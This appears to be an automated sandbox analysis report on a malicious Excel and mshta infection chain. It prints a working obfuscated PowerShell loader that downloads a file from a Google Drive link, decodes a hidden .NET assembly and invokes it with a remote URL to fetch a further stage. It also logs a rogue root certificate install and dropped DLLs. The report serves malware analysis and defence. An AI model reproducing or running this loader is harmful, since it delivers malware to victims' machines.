'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"

Compiles C# or VB.Net code

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\revod450\revod450.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\revod450\revod450.cmdline"

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 31_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,

31_2_004044A4

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_000007FE899B022D push eax; iretd	5_2_000007FE899B0241
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_000007FE899B00BD pushad ; iretd	5_2_000007FE899B00C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0044693D push ecx; ret	31_2_0044694D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0044DB70 push eax; ret	31_2_0044DB84
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0044DB70 push eax; ret	31_2_0044DBAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_00451D54 push eax; ret	31_2_00451D61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_0044B090 push eax; ret	41_2_0044B0A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_0044B090 push eax; ret	41_2_0044B0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00451D34 push eax; ret	41_2_00451D41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00444E71 push ecx; ret	41_2_00444E81
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00414060 push eax; ret	42_2_00414074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00414060 push eax; ret	42_2_0041409C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00414039 push ecx; ret	42_2_00414049
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_004164EB push 0000006Ah; retf	42_2_004165C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00416553 push 0000006Ah; retf	42_2_004165C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00416555 push 0000006Ah; retf	42_2_004165C4

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob

Jump to behavior

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\revod450\revod450.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.dll			Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 41_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

41_2_004047CB

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
